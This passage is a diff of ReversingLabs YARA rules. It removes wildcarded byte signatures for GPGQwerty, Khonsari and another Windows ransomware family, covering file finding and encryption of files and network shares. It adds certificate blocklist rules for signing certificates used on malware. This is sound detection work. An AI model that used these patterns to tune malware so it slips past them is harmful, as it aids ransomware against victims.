-            4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 33 D2 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 41
-            B8 ?? ?? ?? ?? 48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6
-        }
-		$encrypt_files_win64_p2 = {
-            44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 45 33 C9 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94
-            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ??
-            ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 0F B6 44 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? 05 ?? ??
-            ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 39 44 24 ?? 0F 83 ?? ?? ?? ?? 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 48 03 C1 48 89 44 24 ?? 33 D2 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B F8 48 8B 44 24 ?? 48 8B F0 B9 ?? ?? ?? ?? F3 A4 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 8B 4C 24 ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ??
-            ?? 4C 8B C8 45 33 C0 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 0F B6 C0 85 C0 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B 44 24 ??
-            48 8B D0 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 75 ?? C6 44 24 ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F
-            B6 44 24 ?? E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? E9 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA
-        }
-		$encrypt_files_win64_p3 = {
-            48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B
-            F8 33 C0 B9 ?? ?? ?? ?? F3 AA 48 8B 44 24 ?? 48 89 84 24 ?? ?? ?? ?? 41 B9 ?? ?? ??
-            ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48 8B C8 E8
-            ?? ?? ?? ?? 90 48 89 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90
-            48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 48 8B 4C 24 ?? 44 8B C1 48 8B D0 48 8B 8C
-            24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 48 89 44 24
-            ?? 48 8B 8C 24 ?? ?? ?? ?? 48 83 C1 ?? E8 ?? ?? ?? ?? 90 48 8B 4C 24 ?? 48 3B C8 0F
-            85 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 4C 24 ?? 41
-            B8 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90
-            85 C0 74 ?? 8B 44 24 ?? 48 83 F8 ?? 75 ?? C6 44 24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? C6 44
-            24 ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 90 0F B6 44 24 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4
-            ?? ?? ?? ?? 5F 5E C3
-        }
-		$encrypt_network_shares_win64_p1 = {
-            48 89 54 24 ?? 48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 84 24 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 8B C8 E8
-            ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48
-            8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 83
-            C0 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C
-            8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 84 24 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B
-        }
-		$encrypt_network_shares_win64_p2 = {
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ??
-            ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 0F B6 C0 85 C0 0F 85 ?? ?? ??
-            ?? 48 C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 44 24 ?? 48 FF C0 48 89 44 24 ?? 48 8D 8C
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 39 44 24 ?? 73 ?? 48 83 7C 24 ?? ?? 76 ?? 33 D2
-            48 8B 44 24 ?? B9 ?? ?? ?? ?? 48 F7 F1 48 8B C2 48 85 C0 75 ?? 41 B9 ?? ?? ?? ?? 4C
-        }
-		$encrypt_network_shares_win64_p3 = {
-            8D 05 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44
-            24 ?? 48 FF C0 48 89 44 24 ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ??
-            48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
-            E8 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8B C0 48 8D 94 24 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B C8 E8 ?? ?? ?? ?? 90 4C 8B
-            C0 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 C6 44 24 ?? ?? 48 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 90 0F B6 44 24 ?? EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 32 C0 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 90 48 81 C4 ?? ?? ?? ?? C3
-        }
-		$find_files_win64 = {
-            48 89 5C 24 ?? 55 56 57 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33
-            C4 48 89 84 24 ?? ?? ?? ?? 4D 8B F0 49 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 8B E9 48 3B D1
-            74 ?? 0F B7 02 66 83 E8 ?? 66 83 F8 ?? 77 ?? 0F B7 C0 49 0F A3 C0 72 ?? 48 83 EA ??
-            48 3B D5 75 ?? 0F B7 0A 66 83 F9 ?? 75 ?? 48 8D 45 ?? 48 3B D0 74 ?? 4D 8B CE 45 33
-            C0 33 D2 48 8B CD E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 83 E9 ?? 33 FF 66 83 F9 ?? 77 ??
-            0F B7 C1 49 0F A3 C0 B0 ?? 72 ?? 40 8A C7 48 2B D5 48 8D 4C 24 ?? 48 D1 FA 41 B8 ??
-            ?? ?? ?? 48 FF C2 F6 D8 4D 1B FF 4C 23 FA 33 D2 E8 ?? ?? ?? ?? 45 33 C9 89 7C 24 ??
-            4C 8D 44 24 ?? 48 89 7C 24 ?? 33 D2 48 8B CD FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ??
-            75 ?? 4D 8B CE 45 33 C0 33 D2 48 8B CD E8 ?? ?? ?? ?? 8B F8 48 83 FB ?? 74 ?? 48 8B
-            CB FF 15 ?? ?? ?? ?? 8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 8B 9C
-            24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 5F 5E 5D C3 49 8B 76 ?? 49 2B 36 48
-            C1 FE ?? 66 83 7C 24 ?? ?? 75 ?? 66 39 7C 24 ?? 74 ?? 66 83 7C 24 ?? ?? 75 ?? 66 39
-            7C 24 ?? 74 ?? 4D 8B CE 48 8D 4C 24 ?? 4D 8B C7 48 8B D5 E8 ?? ?? ?? ?? 85 C0 75 ??
-            48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 75 ?? 49 8B 06 49 8B 56 ?? 48 2B D0
-            48 C1 FA ?? 48 3B F2 0F 84 ?? ?? ?? ?? 48 2B D6 48 8D 0C F0 4C 8D 0D ?? ?? ?? ?? 41
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files_win64 ) and ( all of ( $encrypt_files_win64_p* ) ) and ( all of ( $encrypt_network_shares_win64_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trambambon LLC" and pe.signatures [ i ] . serial == "53:33:d3:07:9d:8a:fd:a7:15:70:37:75:e1:38:99:91" and 1239148800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Gpgqwerty : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_139A7Ee1F1A7735C151089755Df5D373 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GPGQwerty ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8848e00a-a695-575b-a29d-fc9521859e12"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "eaab67a1-ed7a-58f3-afb3-3637c3b72020"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.GPGQwerty.yara#L1-L83"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e59adadd66b4d242ac7337ce4b3c3ec6c60724f4cf5b86305f1e31b88745928c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13204-L13220"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "86072fef7d1488dc257c3ca8fbb99620ec06f8ecb671b4e20d09d0ce6cc8601d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GPGQwerty"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC
-            ?? 83 F8 ?? 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ?? 31 C0 EB ?? 0F B7 43 ?? 83 C0 ??
-            66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44 04 ?? 84 C0 88 01 75 ?? 8B 44 24
-            ?? 24 ?? 83 F8 ?? 76 ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 66 90
-            89 43 ?? 81 C4 ?? ?? ?? ?? 89 F0 5B 5E C3 E8 ?? ?? ?? ?? 89 C3 E8 ?? ?? ?? ?? 83 F8
-            ?? 89 03 74 ?? E8 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 83 38 ?? 74 ??
-            E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? E8 ??
-            ?? ?? ?? C7 00 ?? ?? ?? ?? EB ?? 90 56 53 89 D3 81 EC ?? ?? ?? ?? 8D 54 24 ?? 89 04
-            24 89 54 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C6 74 ?? 31 C0 8D 4B ?? 66 89 43 ??
-            31 C0 EB ?? 0F B7 43 ?? 83 C0 ?? 66 3D ?? ?? 66 89 43 ?? 83 D1 ?? 0F B7 C0 0F B6 44
-            04 ?? 84 C0 88 01 75 ?? 8B 44 24 ?? 24 ?? 83 F8 ?? 77 ?? 89 43 ?? 81 C4 ?? ?? ?? ??
-            89 F0 5B 5E C3 8D B4 26 ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89 F0 5B
-            5E C3 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 81 C4 ?? ?? ??
-            ?? 89 F0 5B 5E C3
-        }
-		$find_files_p2 = {
-            8B 45 ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 95 C0 84
-            C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85
-            C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ??
-            ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 94 C0 84 C0 0F 84
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 83
-            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45
-            ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            8B 45 ?? 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E8
-        }
-		$encrypt_files = {
-            C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83
-            C0 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44
-            24 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ??
-            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 C2 B8
-            ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8D 85 ?? ?? ?? ?? 01 D0 66 C7 00 ?? ??
-            8B 45 ?? 83 E8 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yongli Li" and pe.signatures [ i ] . serial == "13:9a:7e:e1:f1:a7:73:5c:15:10:89:75:5d:f5:d3:73" and 1476057600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Khonsari : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_74Dbe83082E1B3Dfa29F9C24 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Khonsari ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c3c64256-af1f-5a9d-8a59-8d72993bb8da"
-		date = "2022-01-27"
-		modified = "2022-01-27"
+		id = "dbb75cf2-1b48-52f1-8d06-e35d48c4fea4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Khonsari.yara#L1-L68"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f1003b7863215bcd8e5cdce8ce40551105fb668ea2b8ac765909f9fa5373e6ca"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13222-L13238"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1fdf6471d0b869df1a8630108cdaf1cc97d33e91d4726073913cdc54c7cf0042"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Khonsari"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
-            13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 0B
-            16 0C 2B ?? 07 08 9A 0D 09 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 72 ??
-            ?? ?? ?? 13 ?? 11 ?? 13 ?? 11 ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 09
